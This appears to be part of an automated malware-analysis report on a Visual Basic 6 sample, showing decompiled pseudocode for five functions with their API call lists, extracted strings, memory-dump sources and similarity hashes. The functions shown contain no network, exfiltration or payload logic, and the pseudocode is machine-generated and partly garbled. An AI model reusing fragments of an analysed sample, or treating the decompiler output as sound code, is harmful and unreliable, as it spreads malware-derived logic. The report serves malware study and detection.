
C-Code - Quality: 50%

			E0040E97E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				char* _t73;
				char* _t74;
				char* _t78;
				signed int _t82;
				char* _t88;
				signed int _t92;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t119 = _t118 - 0xc;
				 *[fs:0x0] = _t119;
				L004012A0();
				_v16 = _t119;
				_v12 = 0x401240;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
				_push(0xb);
				_push(0xb);
				_push(0x7db);
				_push( &_v56);
				L00401354();
				_t73 =  &_v56;
				_push(_t73);
				L0040135A();
				_v112 =  ~(0 | _t73 != 0x0000ffff);
				L00401450();
				_t74 = _v112;
				if(_t74 != 0) {
					if( *0x410010 != 0) {
						_v140 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v140 = 0x410010;
					}
					_t78 =  &_v32;
					L004013CC();
					_v112 = _t78;
					_t82 =  *((intOrPtr*)( *_v112 + 0x120))(_v112,  &_v36, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x314))( *_v140));
					asm("fclex");
					_v116 = _t82;
					if(_v116 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x40b1ac);
						_push(_v112);
						_push(_v116);
						L004013D8();
						_v144 = _t82;
					}
					_v136 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v136;
					_v56 = 9;
					if( *0x410010 != 0) {
						_v148 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v148 = 0x410010;
					}
					_t88 =  &_v40;
					L004013CC();
					_v120 = _t88;
					_t92 =  *((intOrPtr*)( *_v120 + 0x60))(_v120,  &_v108, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x300))( *_v148));
					asm("fclex");
					_v124 = _t92;
					if(_v124 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b19c);
						_push(_v120);
						_push(_v124);
						L004013D8();
						_v152 = _t92;
					}
					_v80 = _v108;
					_v88 = 3;
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"IpXl81");
					_push(_v28);
					L0040136C();
					_push( &_v40);
					_t74 =  &_v32;
					_push(_t74);
					_push(2);
					L004013C6();
					L00401450();
				}
				_push(E0040EBC9);
				L004013D2();
				return _t74;
			}

0x0040e981
0x0040e990
0x0040e99c
0x0040e9a4
0x0040e9a7
0x0040e9ae
0x0040e9bd
0x0040e9c0
0x0040e9c2
0x0040e9c4
0x0040e9cc
0x0040e9cd
0x0040e9d2
0x0040e9d5
0x0040e9d6
0x0040e9e6
0x0040e9ed
0x0040e9f2
0x0040e9f8
0x0040ea05
0x0040ea22
0x0040ea07
0x0040ea07
0x0040ea0c
0x0040ea11
0x0040ea16
0x0040ea16
0x0040ea46
0x0040ea4a
0x0040ea4f
0x0040ea5e
0x0040ea64
0x0040ea66
0x0040ea6d
0x0040ea8c
0x0040ea6f
0x0040ea6f
0x0040ea74
0x0040ea79
0x0040ea7c
0x0040ea7f
0x0040ea84
0x0040ea84
0x0040ea96
0x0040ea9c
0x0040eaa6
0x0040eaa9
0x0040eab7
0x0040ead4
0x0040eab9
0x0040eab9
0x0040eabe
0x0040eac3
0x0040eac8
0x0040eac8
0x0040eaf8
0x0040eafc
0x0040eb01
0x0040eb10
0x0040eb13
0x0040eb15
0x0040eb1c
0x0040eb38
0x0040eb1e
0x0040eb1e
0x0040eb20
0x0040eb25
0x0040eb28
0x0040eb2b
0x0040eb30
0x0040eb30
0x0040eb42
0x0040eb45
0x0040eb4c
0x0040eb4f
0x0040eb59
0x0040eb5a
0x0040eb5b
0x0040eb5c
0x0040eb5d
0x0040eb60
0x0040eb6a
0x0040eb6b
0x0040eb6c
0x0040eb6d
0x0040eb6e
0x0040eb70
0x0040eb75
0x0040eb78
0x0040eb83
0x0040eb84
0x0040eb87
0x0040eb88
0x0040eb8a
0x0040eb95
0x0040eb95
0x0040eb9a
0x0040ebc3
0x0040ebc8

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E99C
#538.MSVBVM60(?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E9CD
#557.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E9D6
__vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040E9ED
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EA11
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EA4A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000120), ref: 0040EA7F
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040EAC3
__vbaObjSet.MSVBVM60(0000000B,00000000), ref: 0040EAFC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000060), ref: 0040EB2B
__vbaChkstk.MSVBVM60(00000000,?,0040B19C,00000060), ref: 0040EB4F
__vbaChkstk.MSVBVM60(00000000,?,0040B19C,00000060), ref: 0040EB60
__vbaLateMemCall.MSVBVM60(?,IpXl81,00000002), ref: 0040EB78
__vbaFreeObjList.MSVBVM60(00000002,?,0000000B), ref: 0040EB8A
__vbaFreeVar.MSVBVM60 ref: 0040EB95
__vbaFreeObj.MSVBVM60(0040EBC9,?,?,000007DB,0000000B,0000000B,?,?,?,?,004012A6), ref: 0040EBC3

Strings

IpXl81, xrefs: 0040EB70
pi, xrefs: 0040E9FE, 0040EA07, 0040EA16, 0040EA22, 0040EAB0, 0040EAB9, 0040EAC8, 0040EAD4

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresultNew2$#538#557CallLateList
String ID: IpXl81$pi
API String ID: 2856081814-543231354
Opcode ID: 5256168c5ad644fbdb28be13bd0cff32a31479a9a050ced4735b28a6f73329d6
Instruction ID: afe06243a116f71053368a03d82a2ca6d2077287a8f3ec661aeab918ee211e3b
Opcode Fuzzy Hash: 5256168c5ad644fbdb28be13bd0cff32a31479a9a050ced4735b28a6f73329d6
Instruction Fuzzy Hash: 39511B71E002089FDB10EFA5C846BDDBBB4BF08704F1044AAF509BB2A1D7B969959F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED56, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040ED56(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				signed int _v36;
				char _v40;
				long long _v48;
				char _v56;
				intOrPtr _v64;
				char _v72;
				intOrPtr _v80;
				char _v88;
				intOrPtr _v96;
				char _v104;
				intOrPtr _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				void* _v252;
				signed int _v256;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				signed int _t74;
				char* _t78;
				char* _t82;
				signed int _t86;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t119 = _t118 - 0xc;
				 *[fs:0x0] = _t119;
				L004012A0();
				_v16 = _t119;
				_v12 = 0x401268;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t116);
				_v48 =  *0x401260;
				_v56 = 5;
				_t74 =  &_v56;
				_push(_t74);
				L00401348();
				L0040145C();
				_push(_t74);
				_push(L"Double");
				L00401360();
				asm("sbb eax, eax");
				_v252 =  ~( ~( ~_t74));
				L00401462();
				L00401450();
				_t78 = _v252;
				if(_t78 != 0) {
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v112 = 0x80020004;
					_v120 = 0xa;
					_v96 = 0x80020004;
					_v104 = 0xa;
					_v80 = 0x80020004;
					_v88 = 0xa;
					_v64 = 0x80020004;
					_v72 = 0xa;
					if( *0x410010 != 0) {
						_v272 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v272 = 0x410010;
					}
					_t82 =  &_v40;
					L004013CC();
					_v252 = _t82;
					_t86 =  *((intOrPtr*)( *_v252 + 0x50))(_v252,  &_v36, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x2fc))( *_v272));
					asm("fclex");
					_v256 = _t86;
					if(_v256 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40b19c);
						_push(_v252);
						_push(_v256);
						L004013D8();
						_v276 = _t86;
					}
					_v268 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v268;
					_v56 = 8;
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_push( &_v56);
					L00401342();
					L0040145C();
					L004013D2();
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push( &_v104);
					_push( &_v88);
					_push( &_v72);
					_t78 =  &_v56;
					_push(_t78);
					_push(7);
					L00401432();
				}
				asm("wait");
				_push(E0040EFC5);
				L00401462();
				return _t78;
			}

0x0040ed59
0x0040ed68
0x0040ed74
0x0040ed7c
0x0040ed7f
0x0040ed86
0x0040ed95
0x0040ed9e
0x0040eda1
0x0040eda8
0x0040edab
0x0040edac
0x0040edb6
0x0040edbb
0x0040edbc
0x0040edc1
0x0040edc8
0x0040edce
0x0040edd8
0x0040ede0
0x0040ede5
0x0040edee
0x0040edf4
0x0040edfe
0x0040ee08
0x0040ee0f
0x0040ee19
0x0040ee20
0x0040ee27
0x0040ee2e
0x0040ee35
0x0040ee3c
0x0040ee43
0x0040ee4a
0x0040ee58
0x0040ee75
0x0040ee5a
0x0040ee5a
0x0040ee5f
0x0040ee64
0x0040ee69
0x0040ee69
0x0040ee99
0x0040ee9d
0x0040eea2
0x0040eeba
0x0040eebd
0x0040eebf
0x0040eecc
0x0040eeee
0x0040eece
0x0040eece
0x0040eed0
0x0040eed5
0x0040eedb
0x0040eee1
0x0040eee6
0x0040eee6
0x0040eef8
0x0040eefe
0x0040ef08
0x0040ef0b
0x0040ef18
0x0040ef1f
0x0040ef23
0x0040ef27
0x0040ef2b
0x0040ef2f
0x0040ef33
0x0040ef34
0x0040ef3e
0x0040ef46
0x0040ef51
0x0040ef58
0x0040ef5c
0x0040ef60
0x0040ef64
0x0040ef68
0x0040ef69
0x0040ef6c
0x0040ef6d
0x0040ef6f
0x0040ef74
0x0040ef77
0x0040ef78
0x0040efbf
0x0040efc4

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040ED74
#591.MSVBVM60(00000005), ref: 0040EDAC
__vbaStrMove.MSVBVM60(00000005), ref: 0040EDB6
__vbaStrCmp.MSVBVM60(Double,00000000,00000005), ref: 0040EDC1
__vbaFreeStr.MSVBVM60(Double,00000000,00000005), ref: 0040EDD8
__vbaFreeVar.MSVBVM60(Double,00000000,00000005), ref: 0040EDE0
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040EE64
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EE9D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000050), ref: 0040EEE1
#596.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EF34
__vbaStrMove.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EF3E
__vbaFreeObj.MSVBVM60(00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EF46
__vbaFreeVarList.MSVBVM60(00000007,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A,00000008,0000000A,0000000A,0000000A,0000000A,0000000A,0000000A), ref: 0040EF6F
__vbaFreeStr.MSVBVM60(0040EFC5,Double,00000000,00000005), ref: 0040EFBF

Strings

pi, xrefs: 0040EE51, 0040EE5A, 0040EE69, 0040EE75
Double, xrefs: 0040EDBC

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#591#596CheckChkstkHresultListNew2
String ID: Double$pi
API String ID: 3707479433-4149698547
Opcode ID: 0151d39126b19ee1aa04ad5b9fad7c3af488bc69c4be31e04a657732a2d427d0
Instruction ID: dd9cab06612df7e1b28783b43c2afec3040c465cab675d1bac250f8d9db1230d
Opcode Fuzzy Hash: 0151d39126b19ee1aa04ad5b9fad7c3af488bc69c4be31e04a657732a2d427d0
Instruction Fuzzy Hash: B451E9B194021DEBDB21DF91D945FDEB7B8FB08304F1081AAE105B71A1DBB85A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2C5, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040E2C5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a40, void* _a48) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v40;
				void* _v56;
				void* _v60;
				char _v76;
				char* _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				signed int _v128;
				signed int _v136;
				signed int _t42;
				signed int _t43;
				intOrPtr _t65;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t65;
				_push(0x74);
				L004012A0();
				_v12 = _t65;
				_v8 = 0x4011e8;
				L004013E4();
				L00401420();
				L004013E4();
				L00401420();
				_v100 =  &_v24;
				_v108 = 0x4008;
				_push(1);
				_push( &_v108);
				_push( &_v76);
				L0040138A();
				_v116 = 0x40b224;
				_v124 = 0x8008;
				_push( &_v76);
				_t42 =  &_v124;
				_push(_t42);
				L004013F0();
				_v128 = _t42;
				L00401450();
				_t43 = _v128;
				if(_t43 != 0) {
					_t43 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
					_v128 = _t43;
					if(_v128 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x718);
						_push(0x40ae70);
						_push(_a4);
						_push(_v128);
						L004013D8();
						_v136 = _t43;
					}
				}
				_push(E0040E3E1);
				L00401462();
				L00401450();
				L00401450();
				L00401462();
				return _t43;
			}

0x0040e2ca
0x0040e2d5
0x0040e2d6
0x0040e2dd
0x0040e2e0
0x0040e2e8
0x0040e2eb
0x0040e2f8
0x0040e303
0x0040e30e
0x0040e31b
0x0040e323
0x0040e326
0x0040e32d
0x0040e332
0x0040e336
0x0040e337
0x0040e33c
0x0040e343
0x0040e34d
0x0040e34e
0x0040e351
0x0040e352
0x0040e357
0x0040e35e
0x0040e363
0x0040e369
0x0040e373
0x0040e379
0x0040e380
0x0040e39f
0x0040e382
0x0040e382
0x0040e387
0x0040e38c
0x0040e38f
0x0040e392
0x0040e397
0x0040e397
0x0040e380
0x0040e3a6
0x0040e3c3
0x0040e3cb
0x0040e3d3
0x0040e3db
0x0040e3e0

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E2E0
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E2F8
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E303
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E30E
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E31B
#619.MSVBVM60(?,00004008,00000001), ref: 0040E337
__vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E352
__vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E35E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AE70,00000718), ref: 0040E392
__vbaFreeStr.MSVBVM60(0040E3E1,?,?,?,00004008,00000001), ref: 0040E3C3
__vbaFreeVar.MSVBVM60(0040E3E1,?,?,?,00004008,00000001), ref: 0040E3CB
__vbaFreeVar.MSVBVM60(0040E3E1,?,?,?,00004008,00000001), ref: 0040E3D3
__vbaFreeStr.MSVBVM60(0040E3E1,?,?,?,00004008,00000001), ref: 0040E3DB

Strings

ABC, xrefs: 0040E313

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#619CheckChkstkHresult
String ID: ABC
API String ID: 4030740960-2743272264
Opcode ID: 88acfcec9c27998f32df17f987891787ae0b5406e538775aca99d9a9aba9f49f
Instruction ID: d54c8db27c9f3f3f2b71e89c8d66e72757aa622ca47d218e94abfd71f069998d
Opcode Fuzzy Hash: 88acfcec9c27998f32df17f987891787ae0b5406e538775aca99d9a9aba9f49f
Instruction Fuzzy Hash: 6731C771800208ABDB10EFA2C886ADDBBB8EF14748F50447EF505B71E1DB786A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3F4, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040E3F4(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v12;
				long long* _v16;
				char _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				void* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				signed char _v148;
				signed long long _v156;
				signed long long _v160;
				signed int _v164;
				signed int* _t60;
				char* _t67;
				char* _t71;
				signed int _t75;
				signed char _t76;
				signed int _t80;
				intOrPtr _t86;
				void* _t92;
				long long* _t93;
				void* _t94;
				intOrPtr* _t95;
				signed long long _t98;
				signed long long _t100;

				_t93 = _t92 - 0xc;
				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L004012A0();
				_v16 = _t93;
				_v12 = 0x401210;
				_t60 = _a8;
				 *_t60 =  *_t60 & 0x00000000;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_push( &_v80);
				_push( &_v64);
				_t98 =  *0x401208;
				 *_t93 = _t98;
				asm("fld1");
				 *_t93 = _t98;
				asm("fld1");
				 *_t93 = _t98;
				L0040137E();
				L00401384();
				asm("fcomp qword [0x401200]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t60 == 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_v136 = 1;
				}
				_v116 =  ~_v136;
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401432();
				_t94 = _t93 + 0xc;
				_t67 = _v116;
				if(_t67 == 0) {
					L16:
					asm("wait");
					_push(E0040E630);
					return _t67;
				} else {
					if( *0x410010 != 0) {
						_v140 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v140 = 0x410010;
					}
					_t86 =  *((intOrPtr*)( *_v140));
					_t71 =  &_v44;
					L004013CC();
					_v116 = _t71;
					_t75 =  *((intOrPtr*)( *_v116 + 0x58))(_v116,  &_v48, _t71,  *((intOrPtr*)(_t86 + 0x31c))( *_v140));
					asm("fclex");
					_v120 = _t75;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40b1bc);
						_push(_v116);
						_push(_v120);
						L004013D8();
						_v144 = _t75;
					}
					_push(0);
					_push(0);
					_push(_v48);
					_t76 =  &_v64;
					_push(_t76);
					L004013BA();
					_t95 = _t94 + 0x10;
					_push(_t76);
					L004013B4();
					_v148 = _t76;
					asm("fild dword [ebp-0x90]");
					_v156 = _t98;
					_t100 = _v156 *  *0x4011f8;
					asm("fnstsw ax");
					if((_t76 & 0x0000000d) != 0) {
						goto L1;
					} else {
						_v160 = _t100;
						 *_t95 = _v160;
						_t80 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t86);
						asm("fclex");
						_v124 = _t80;
						if(_v124 >= 0) {
							_v164 = _v164 & 0x00000000;
						} else {
							_push(0x84);
							_push(0x40ae40);
							_push(_a4);
							_push(_v124);
							L004013D8();
							_v164 = _t80;
						}
						_push( &_v48);
						_t67 =  &_v44;
						_push(_t67);
						_push(2);
						L004013C6();
						L00401450();
						goto L16;
					}
				}
				L1:
				return __imp____vbaFPException();
			}

0x0040e3f7
0x0040e3fa
0x0040e405
0x0040e406
0x0040e412
0x0040e41a
0x0040e41d
0x0040e424
0x0040e427
0x0040e42a
0x0040e431
0x0040e438
0x0040e43f
0x0040e449
0x0040e44d
0x0040e44e
0x0040e456
0x0040e459
0x0040e45d
0x0040e460
0x0040e464
0x0040e467
0x0040e46c
0x0040e471
0x0040e477
0x0040e479
0x0040e47a
0x0040e488
0x0040e47c
0x0040e47c
0x0040e47c
0x0040e497
0x0040e49e
0x0040e4a2
0x0040e4a3
0x0040e4a5
0x0040e4aa
0x0040e4ad
0x0040e4b3
0x0040e5f0
0x0040e5f0
0x0040e5f1
0x00000000
0x0040e4b9
0x0040e4c0
0x0040e4dd
0x0040e4c2
0x0040e4c2
0x0040e4c7
0x0040e4cc
0x0040e4d1
0x0040e4d1
0x0040e4f7
0x0040e501
0x0040e505
0x0040e50a
0x0040e519
0x0040e51c
0x0040e51e
0x0040e525
0x0040e541
0x0040e527
0x0040e527
0x0040e529
0x0040e52e
0x0040e531
0x0040e534
0x0040e539
0x0040e539
0x0040e548
0x0040e54a
0x0040e54c
0x0040e54f
0x0040e552
0x0040e553
0x0040e558
0x0040e55b
0x0040e55c
0x0040e561
0x0040e567
0x0040e56d
0x0040e579
0x0040e57f
0x0040e583
0x00000000
0x0040e589
0x0040e589
0x0040e596
0x0040e5a1
0x0040e5a7
0x0040e5a9
0x0040e5b0
0x0040e5cf
0x0040e5b2
0x0040e5b2
0x0040e5b7
0x0040e5bc
0x0040e5bf
0x0040e5c2
0x0040e5c7
0x0040e5c7
0x0040e5d9
0x0040e5da
0x0040e5dd
0x0040e5de
0x0040e5e0
0x0040e5eb
0x00000000
0x0040e5eb
0x0040e583
0x004012ac
0x004012ac

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E412
#677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E467
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E46C
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040E4A5
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,004012A6), ref: 0040E4CC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E505
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1BC,00000058), ref: 0040E534
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E553
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,004012A6), ref: 0040E55C
__vbaHresultCheckObj.MSVBVM60(00000000,00401210,0040AE40,00000084), ref: 0040E5C2
__vbaFreeObjList.MSVBVM60(00000002,?,00000000), ref: 0040E5E0
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,004012A6), ref: 0040E5EB

Strings

pi, xrefs: 0040E4B9, 0040E4C2, 0040E4D1, 0040E4DD

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultList$#677CallChkstkLateNew2
String ID: pi
API String ID: 1795533351-451671704
Opcode ID: 7e9da46372f3103f97e25a7a504abac028a48251e58744412aaf7acb4f478a0a
Instruction ID: c989dc107380329087d218930f762c3eca55e47e712e33419ba2968f8c2f2116
Opcode Fuzzy Hash: 7e9da46372f3103f97e25a7a504abac028a48251e58744412aaf7acb4f478a0a
Instruction Fuzzy Hash: 685168B0900218EFDB20DFA1CC45BEDBBB8BB08304F1085AAF145B72A1DB7859948F19

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFEC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040EFEC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				char* _t35;
				signed int _t39;
				intOrPtr _t58;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_push(0x48);
				L004012A0();
				_v12 = _t58;
				_v8 = 0x401278;
				L004013E4();
				L004013E4();
				if( *0x410010 != 0) {
					_v88 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v88 = 0x410010;
				}
				_t35 =  &_v56;
				L004013CC();
				_v76 = _t35;
				_v64 = 1;
				_v72 = 2;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t39 =  *((intOrPtr*)( *_v76 + 0x17c))(_v76, 0x10, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x314))( *_v88));
				asm("fclex");
				_v80 = _t39;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x17c);
					_push(0x40b1ac);
					_push(_v76);
					_push(_v80);
					L004013D8();
					_v92 = _t39;
				}
				L004013D2();
				_push(E0040F0F6);
				L00401450();
				L00401450();
				return _t39;
			}

0x0040eff1
0x0040effc
0x0040effd
0x0040f004
0x0040f007
0x0040f00f
0x0040f012
0x0040f01f
0x0040f02a
0x0040f036
0x0040f050
0x0040f038
0x0040f038
0x0040f03d
0x0040f042
0x0040f047
0x0040f047
0x0040f06b
0x0040f06f
0x0040f074
0x0040f077
0x0040f07e
0x0040f088
0x0040f092
0x0040f093
0x0040f094
0x0040f095
0x0040f09e
0x0040f0a4
0x0040f0a6
0x0040f0ad
0x0040f0c9
0x0040f0af
0x0040f0af
0x0040f0b4
0x0040f0b9
0x0040f0bc
0x0040f0bf
0x0040f0c4
0x0040f0c4
0x0040f0d0
0x0040f0d5
0x0040f0e8
0x0040f0f0
0x0040f0f5

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F007
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040F01F
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040F02A
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,?,?,004012A6), ref: 0040F042
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F06F
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F088
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,0000017C), ref: 0040F0BF
__vbaFreeObj.MSVBVM60 ref: 0040F0D0
__vbaFreeVar.MSVBVM60(0040F0F6), ref: 0040F0E8
__vbaFreeVar.MSVBVM60(0040F0F6), ref: 0040F0F0

Strings

pi, xrefs: 0040F02F, 0040F038, 0040F047, 0040F050

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresultNew2
String ID: pi
API String ID: 2096563423-451671704
Opcode ID: 6f195ac15ba07db6b5f320ca55c68962992f8df94a50540cbe7f1e6d479bd90e
Instruction ID: ff66225f1c45c22e596ea6d29f2b4cdfdba79971bbeb0d1fcc8baace85dd0be5
Opcode Fuzzy Hash: 6f195ac15ba07db6b5f320ca55c68962992f8df94a50540cbe7f1e6d479bd90e
Instruction Fuzzy Hash: EB312770910208AFDB10EF91D846BDDBBB4AF09708F60447AF401BB6E1D7BD6949CB59

Uniqueness

